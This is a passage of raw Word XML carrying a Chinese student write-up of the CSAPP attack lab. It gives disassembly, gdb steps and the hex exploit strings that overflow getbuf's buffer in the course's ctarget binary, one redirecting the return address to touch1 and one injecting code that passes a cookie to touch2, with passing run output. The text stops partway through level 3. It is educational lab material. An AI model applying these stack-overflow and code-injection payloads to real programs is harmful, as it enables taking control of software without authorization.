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32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="121212"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CSAPP实验之attack lab</w:t>
      </w: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30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="121212"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实验环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>Ubuntu 18.04 LTS实体机</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8"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="121212"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>预备内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>gdb调试</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>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8"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实验说明</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rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">整个lab分为5个level，前3个是代码注入，后2个是回归导向编程ROP攻击 </w:t>
      </w:r>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30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="121212"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Part I ：Code Injection Attacks</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函数Test（）的代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts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void test() </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>2</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 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>3</w:t>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w:t>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int val; </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">4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val = getbuf(); </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>5</w:t>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w:t>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printf("No exploit. Getbuf returned 0x%x\n", val);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6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函数grtbuf（）的代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">1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unsigned getbuf()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2</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char buf[BUFFER_SIZE];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4</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Gets(buf);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5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return 1;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6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objdump -d ctarget &gt; ctarget.txt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将ctarget代码反汇编，输出到ctarget文本文件中，方便看。</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0000000000001f5d &lt;test&gt;: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1f5d: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1f61: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83 ec 08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sub    $0x8,%rsp</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1f65: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1f6a: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05 fe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1d74 &lt;getbuf&gt;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1f6f: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89 c2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%eax,%edx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1f71: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35 e0 23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0x23e0(%rip),%rsi        # 4358 &lt;_IO_stdin_used+0x358&gt;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1f78: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1f7d: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1f82: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f9 f3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1380 &lt;__printf_chk@plt&gt;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1f87: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83 c4 08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add    $0x8,%rsp</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1f8b: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0000000000001d74 &lt;getbuf&gt;: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1d74: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1d78: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83 ec 38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sub    $0x38,%rsp</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1d7c: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48 89 e7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%rsp,%rdi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1d7f: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b5 02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2039 &lt;Gets&gt;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1d84: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1d89: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83 c4 38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add    $0x38,%rsp</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1d8d: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首先，在 1d78 行，为 getbuf 分配了 0x38 ,即 56 位的空间。</w:t>
      </w:r>
    </w:p>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8"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="121212"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>level 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数touch1（）的代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts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void touch1()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2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vlevel = 1; /* Part of validation protocol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4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printf("Touch1!: You called touch1()\n");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5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validate(1);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6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exit(0);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7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Touch1的反汇编代码</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0000000000001d8e &lt;touch1&gt;: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1d8e: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1d92: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1d93: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pop    %rax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1d94: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83 ec 08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sub    $0x8,%rsp</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1d98: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05 3a 56 00 00 01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$0x1,0x563a(%rip)        # 73dc &lt;vlevel&gt;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1d9f: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1da2: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3d e7 24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0x24e7(%rip),%rdi        # 4290 &lt;_IO_stdin_used+0x290&gt;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1da9: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c2 f4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1270 &lt;puts@plt&gt;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1dae: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1db3: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f4 04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22ac &lt;validate&gt;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1db8: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1dbd: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fe f5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13c0 &lt;exit@plt&gt;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通过 GDB 调试，发现地址的偏移量是 0x555555554000 ,所以 touch1 的地址是 0x555555555d8e 。为了跳转到touch1 ,首先需要填满 getbuf ，我默认用 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> 来填充。然后用小段法输入 touch1 的地址来覆盖调用者的返回地址，即 8e 5d 55 55 55 55 00 00。所以最后的输入是：</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00 00 00 00 00 00 00 00</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8e 5d 55 55 55 55 00 00</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利用 cat re.txt | ./hex2raw | ./ctarget 运行一下</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Cookie: 0x747c9c5e</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Type string:Touch1!: You called touch1()</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Valid solution for level 1 with target ctarget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PASS: Sent exploit string to server to be validated.</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NICE JOB!</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28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="121212"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>level 2</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touch2的代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">1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void touch2(unsigned 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2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vlevel = 2; /* Part of validation protocol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4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if (val == cookie)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5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printf("Touch2!: You called touch2(0x%.8x)\n", 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6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validate(2);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7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else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8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printf("Misfire: You called touch2(0x%.8x)\n", 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9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fail(2);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10 </w:t>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11 </w:t>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exit(0);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12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touch2的反汇编代码</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0000000000001dc2 &lt;touch2&gt;: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1dc2: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1dc6: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1dc7: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pop    %rax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1dc8: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83 ec 08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sub    $0x8,%rsp</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1dcc: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89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%edi,%edx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1dce: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05 04 56 00 00 02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$0x2,0x5604(%rip)        # 73dc &lt;vlevel&gt;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1dd5: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1dd8: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39 3d 06 56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cmp    %edi,0x5606(%rip)        # 73e4 &lt;cookie&gt;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1dde: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74 2a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je     1e0a &lt;touch2+0x48&gt;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1de0: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35 f9 24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0x24f9(%rip),%rsi        # 42e0 &lt;_IO_stdin_used+0x2e0&gt;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1de7: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1dec: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1df1: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8a f5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1380 &lt;__printf_chk@plt&gt;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1df6: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02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$0x2,%edi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1dfb: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80 05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2380 &lt;fail&gt;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1e00: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1e05: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b6 f5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13c0 &lt;exit@plt&gt;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1e0a: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35 a7 24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0x24a7(%rip),%rsi        # 42b8 &lt;_IO_stdin_used+0x2b8&gt;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1e11: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1e16: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$0x0,%eax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1e1b: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60 f5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1380 &lt;__printf_chk@plt&gt;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1e20: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02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$0x2,%edi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1e25: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82 04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22ac &lt;validate&gt;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1e2a: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eb d4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jmp    1e00 &lt;touch2+0x3e&gt;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touch2的地址是 0x555555555dc2 。我需要跳转到 touch2 ,并且让传进来的参数 val 与 cookie 相等，即需要将cookie的值 0x747c9c5e 赋给 val 。所以将 cookie 的值存放在寄存器 %rdi 里，为了返回到 touch2 中，且不使用 call 和 jmp ，就用 ret 。要把 touch2 的地址压栈，用栈顶地址来覆盖调用者的返回地址。写成汇编代码就是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movq</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$0x747c9c5e,%rdi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movq</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$0x555555555dc2,%rdx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pushq</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%rdx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retq</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用 GDB 调试 ctarget ，在 getbuf 处加断点，运行到 getbuf 开辟栈空间， 用 i r rsp 查看栈顶地址是 0x556796f8 。利用 echo "……" &gt; inject.s 指令，将汇编代码写到 inject.s文件里。再编译 gcc -c inject.s,查看反汇编代码 objdump -d inject.o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inject.o：     文件格式 elf64-x86-64</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Disassembly of section .text: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0000000000000000 &lt;.text&gt;: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c7 c7 5e 9c 7c 74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$0x747c9c5e,%rdi</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ba c2 5d 55 55 55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movabs $0x555555555dc2,%rdx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55 00 00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%rdx</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获得反汇编代码 48 c7 c7 5e 9c 7c 74 48 ba c2 5d 55 55 55 55 00 00 52 c3 。先填充 注入代码地址，再用 0 填满 bufsize ，最后是返回栈顶地址。所以最后的输入是：</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48 c7 c7 5e 9c 7c 74 48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ba c2 5d 55 55 55 55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52 c3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00 00 00 00 00 00 00 00</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f8 96 67 55 00 00 00 00</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利用 cat re.txt | ./hex2raw | ./ctarget 运行一下</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Cookie: 0x747c9c5e</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Type string:Touch2!: You called touch2(0x747c9c5e)</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Valid solution for level 2 with target ctarget</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PASS: Sent exploit string to server to be validated.</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NICE JOB!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pP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8"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>level 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>hexmatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>（）和touch3（）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">1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Compare string to hex represention of unsigned value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2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int hexmatch(unsigned val, char *sval)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3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4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char cbuf[110];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5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Make position of check string unpredictable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6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char *s = cbuf + random() % 100;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7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sprintf(s, "%.8x", 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8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return strncmp(sval, s, 9) == 0;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9</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10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11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void touch3(char *sval)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12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vlevel = 3; /* Part of validation protocol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14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if (hexmatch(cookie, sval))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15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printf("Touch3!: You called touch3(\"%s\")\n", sval);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16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validate(3);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17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else {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18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printf("Misfire: You called touch3(\"%s\")\n", sval);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19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fail(3);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20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21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exit(0); </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">22 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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touch3的反汇编代码</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0000000000001ee7 &lt;touch3&gt;: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1ee7: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1eeb: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%rbx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1eec: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fb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%rdi,%rbx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1eef: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05 e3 54 00 00 03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$0x3,0x54e3(%rip)        # 73dc &lt;vlevel&gt;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1ef6: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00 00 00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1ef9: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fe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%rdi,%rsi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1efc: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8b 3d e2 54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0x54e2(%rip),%edi        # 73e4 &lt;cookie&gt;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1f02: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25 ff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1e2c &lt;hexmatch&gt;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1f07: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85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test   %eax,%eax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1f09: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74 2d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je     1f38 &lt;touch3+0x51&gt;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1f0b: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da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%rbx,%rdx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1f0e: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35 f3 23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0x23f3(%rip),%rsi        # 4308 &lt;_IO_stdin_used+0x308&gt;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1f15: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1f1a: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1f1f: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5c f4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1380 &lt;__printf_chk@plt&gt;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1f24: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03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$0x3,%edi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1f29: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7e 03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22ac &lt;validate&gt;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1f2e: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1f33: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88 f4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13c0 &lt;exit@plt&gt;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1f38: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da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%rbx,%rdx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1f3b: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35 ee 23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0x23ee(%rip),%rsi        # 4330 &lt;_IO_stdin_used+0x330&gt;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1f42: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1f47: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1f4c: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2f f4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1380 &lt;__printf_chk@plt&gt;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1f51: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bf 03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$0x3,%edi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1f56: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25 04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2380 &lt;fail&gt;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1f5b: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eb d1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jmp    1f2e &lt;touch3+0x47&gt;</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touch3 的地址是 0x555555555ee7 。touch3里还调用了 hexmatch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Hexmatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:eastAsia="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>的反汇编代码</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0000000000001e2c &lt;hexmatch&gt;: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1e2c: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1e30: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41 55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%r13</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1e32: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41 54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%r12</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1e34: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55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%rbp</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1e35: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%rbx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1e36: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81 ec 88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sub    $0x88,%rsp</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1e3d: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89 fd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%edi,%ebp</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1e3f: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f3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%rsi,%rbx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1e42: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41 